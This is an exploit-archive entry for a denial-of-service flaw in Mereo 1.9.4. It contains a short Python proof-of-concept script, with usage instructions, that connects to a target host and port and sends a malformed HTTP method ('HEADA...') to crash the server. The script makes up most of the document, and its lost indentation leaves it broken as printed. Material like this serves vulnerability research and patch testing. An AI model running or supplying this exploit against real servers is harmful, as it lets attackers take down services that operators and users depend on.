Mereo version 1.9.4 suffers from a remote HTTP server denial of service vulnerability.
61835931a9f8d5b82c7478435a3bcb73
#!/usr/bin/python
'''
# Exploit Title: Mereo 1.9.4 - Remote HTTP Server Denial of Service
# Date: 06-2020
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/mereo/
# Software Link: https://sourceforge.net/projects/mereo/files/
# Version: 1.9.4
# Tested on: Windows 7 , Windows Vista
# Description : Mereo version 1.9.4 is vulnerable against DoS, An attacker can cause application crash with
sending a buffer like GET+One Character or Head+One Character eg. GETA or HEADA , Since the HTTP method is
not supported with the application, so it will be caused to crash.
Usage:
python mereo194_dos.py 1.2.3.4 80
'''
import socket
import os
import sys
if len(sys.argv) != 3:
print "Usage: python mereo194_dos.py targetIP targetPort"
else:
print "[*] Sending evil http request to target"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((sys.argv[1], int(sys.argv[2])))
expl.send("\x48\x45\x41\x44\x41\x41\x41\x41\x41\x41")
expl.close()